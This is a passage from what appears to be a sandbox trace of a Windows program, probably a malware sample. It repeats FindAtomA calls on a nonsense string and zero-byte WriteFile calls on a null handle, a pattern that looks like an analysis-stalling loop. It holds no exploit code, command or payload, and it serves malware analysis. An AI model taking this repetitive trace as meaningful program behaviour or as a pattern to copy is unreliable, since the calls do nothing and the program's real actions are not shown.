nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.454] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.454] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.454] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.454] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.455] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.455] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.455] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.455] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.455] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.455] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.456] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.456] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.456] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.456] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.456] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.456] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.456] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.456] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.457] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.457] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.457] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.457] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.457] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.457] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.457] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.457] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.457] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.457] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.457] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.457] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.457] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.458] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.458] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.458] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.458] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.458] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.458] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.458] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.458] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.458] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.458] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.459] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.459] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.459] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.459] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.459] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.459] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.459] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.459] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.459] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.459] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.459] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.460] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.460] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.460] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.460] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.460] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.460] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.460] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.460] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.460] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.460] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.461] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.461] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.461] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.461] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.461] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.461] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.461] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.461] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.461] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.461] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.462] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.462] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.462] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.462] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.462] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.462] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.462] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.462] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.462] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.462] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.462] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.462] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.462] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.462] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.462] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.462] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.462] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.462] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.462] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.462] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.462] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.463] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.463] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.463] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.463] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.463] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.463] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.463] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.463] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.463] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.463] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.463] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.463] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.463] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.463] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.463] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.463] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.463] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.464] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.464] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.464] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.464] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.464] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.464] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.464] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.464] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.464] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.464] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.465] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.465] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.465] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.465] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.465] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.465] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.465] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.465] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.465] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.465] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.465] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.466] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.466] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.466] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.466] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.466] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.466] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.466] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.466] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.466] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.466] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.466] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.466] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.466] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.466] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.466] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.466] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.466] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.466] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.466] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.467] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.467] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.467] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.467] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.467] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.467] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.467] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.467] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.467] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.467] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.467] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.467] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.467] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.467] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.467] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.467] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.467] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.467] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.467] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.467] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.467] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.467] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.467] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.467] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, 